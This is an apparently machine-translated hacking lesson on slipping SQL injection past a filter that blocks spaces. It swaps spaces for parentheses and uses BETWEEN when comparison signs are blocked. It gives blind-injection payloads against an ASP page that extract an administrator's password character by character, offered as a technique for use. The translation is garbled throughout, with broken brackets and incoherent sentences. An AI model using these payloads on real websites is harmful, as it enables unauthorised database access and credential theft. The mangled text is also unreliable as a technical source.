Ignore first-class information interception system (Lesson 3)

FoolishQiang
Breakthrough leading monitoring space

////////////////////

First-class strict space monitoring. Therefore, it is necessary to break through the space monitoring. There are many Replacement Methods for spaces, such as TAB spaces and/**/in the SQL database. However, the current Administrator has added these methods. So we need to find a new breakthrough.

///////////////

SQL statements generally contain spaces, such as select id from [name]. If there is no space in the middle, it becomes selectidfrom [name. Statement error. However, brackets can run in the same way as SQL statements. For example, the preceding statements can be written as select (id) from [name], which are separated by parentheses and can be executed normally.
For example, let's get an injection point: jmdcw. asp? Name = aaand 1 = 1 and =. If you replace 1 = 1 with the statement used to query the Administrator's password: (select asc (mid (pass, 1, 1 )) from [name] where id = 1)> 49. How to Use spaces? It can be written as follows:
Jmdcw. asp? Name = aaand (select (asc (mid (pass, 1, 1) from [name] where (id = 1)> 49) and =
If the <and> symbols are blocked, use... And ..., Statement:
Jmdcw. asp? Name = aaand (select (asc (mid (pass, 1, 1) from [name] where (id = 1) between (40) and (50) and =

() Should be used to replace spaces in the middle. However, it is not easy to use complicated SQL statements. The above mentioned is the numeric type. If it is a numeric type, you can add a bracket after id = 1, but this is not tested, for example: jmdcw. asp? Id = (1) and (select .....),

//////////////////

After class I, many people are also concerned about how to break through: This webpage is a webpage Trojan and automatically blocked.